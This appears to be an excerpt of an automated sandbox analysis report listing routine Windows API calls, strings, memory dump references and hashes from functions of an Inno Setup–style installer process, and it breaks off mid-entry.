                                                            Function 0040E6A0, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                            • Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
                                                            • Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                            • Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040E2C4, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
                                                            • RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                            • API String ID: 2701450724-3496071916
                                                            • Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                            • Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
                                                            • Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                            • Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AC23C, Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SHGetKnownFolderPath.SHELL32(006CD7F4,00008000,00000000,?,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A), ref: 006AC434
                                                            • CoTaskMemFree.OLE32(?,006AC477,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC46A
                                                            • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                            • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FolderFreeKnownPathTask
                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                            • API String ID: 969438705-544719455
                                                            • Opcode ID: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                            • Instruction ID: b9958020655176fa4da1f40778f72373ecd7cbade583b9d7093994fb637c8e1d
                                                            • Opcode Fuzzy Hash: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                            • Instruction Fuzzy Hash: A281D530E012049FDB10FFA4E852BAD7BA7EB8A714F50447AF400A7395C678AD51CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00410BF4, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID: P\l$p\l
                                                            • API String ID: 3997070919-2963016475
                                                            • Opcode ID: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                            • Instruction ID: dea4787ea8a346106a271a8220094215500c3d30852de538169348a6bce77c0f
                                                            • Opcode Fuzzy Hash: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                            • Instruction Fuzzy Hash: EDA18D75A003099FDB24CFA9D881BEEBBB6EB58310F14452AE505A7390DBB4E9C1CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AC8CC, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC957
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC960
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: Created temporary directory: $\_setup64.tmp$_isetup$bm
                                                            • API String ID: 1375471231-4222912607
                                                            • Opcode ID: e237758f4fd82c383e0ca560b4e3332f66906f72f2642b2f4657cc3014f73248
                                                            • Instruction ID: fab29f73b12df9647497e51388a78cad5e0a4b86d3a417c00642db4583a337af
                                                            • Opcode Fuzzy Hash: e237758f4fd82c383e0ca560b4e3332f66906f72f2642b2f4657cc3014f73248
                                                            • Instruction Fuzzy Hash: 00412E34A102099BDB01FBA4D891AEEB7B6FF89704F50417AF501B7391DA34AE458B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006C4660, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C4673), ref: 00410BB4
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006C4683
                                                            • SetWindowLongW.USER32 ref: 006C469F
                                                            • SetErrorMode.KERNEL32(00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C46B4
                                                              • Part of subcall function 006B9800: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                              • Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765
                                                              • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                            • ShowWindow.USER32(?,00000005,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C472B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                            • String ID: Loj$Setup
                                                            • API String ID: 1533765661-1180797960
                                                            • Opcode ID: 17f777bc5e0ddd78fa34bb04f44403f63e29e5f52b8ab729edceb4b8c292e480
                                                            • Instruction ID: d4d45baa3e9a68820d1f8b3b63154724c7fffc608bd47f906fb52fcab16a7fb3
                                                            • Opcode Fuzzy Hash: 17f777bc5e0ddd78fa34bb04f44403f63e29e5f52b8ab729edceb4b8c292e480
                                                            • Instruction Fuzzy Hash: BE216D782046009FD700EF29DC91DA67BFAEB9E71071145B8F9008B3A2CE74BC80CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409EF8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                            • Instruction ID: e2cc099636b1ff89dc3d2fe7d8b391202ea9480b4d839bd65efd70e323d436a8
                                                            • Opcode Fuzzy Hash: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                            • Instruction Fuzzy Hash: 60316F20B006429AD720AB7A9484B2777E66B44328F14053FE449E62E3D7BCDCC4C75D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409EF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                            • Instruction ID: 07d30fd0877b4d42c88f7c1dd8669400ca79996a2773cdc214a63d44a36a60ff
                                                            • Opcode Fuzzy Hash: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                            • Instruction Fuzzy Hash: C4316E20A007828ADB21AB769494B2777E26F15318F14487FE049E62E3D7BCDCC4C71E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004785F8, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                            • String ID:
                                                            • API String ID: 4025006896-0
                                                            • Opcode ID: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
                                                            • Instruction ID: 194e1b82028893281538589df9a22bcce55ada3cdaffe31495447ecbac098301
                                                            • Opcode Fuzzy Hash: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
                                                            • Instruction Fuzzy Hash: D501C4716452057BCB10EB98EC85FDF739EE758314F10811AF508E7391CA39E9418BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006ACABC, Relevance: 6.0, APIs: 4, Instructions: 34sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLast$CountSleepTick
                                                            • String ID:
                                                            • API String ID: 2227064392-0
                                                            • Opcode ID: e92de128a85ff465f893565a8a936560ef2ccf8464eadd77d591fb41e4d7bbbe
                                                            • Instruction ID: 650aecd8dda8324acb9ef1ef12543e615cdaddf0aa48ac4ca6bdf88ba774c7be
                                                            • Opcode Fuzzy Hash: e92de128a85ff465f893565a8a936560ef2ccf8464eadd77d591fb41e4d7bbbe
                                                            • Instruction Fuzzy Hash: 2AE02B7234838094D725356E58864BE8D5ACFC3376F280A3FF0C4D2182C4058D85C576
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AE3C8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendNotifyMessageW.USER32(000302CC,00000496,00002711,-00000001), ref: 006AE618
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
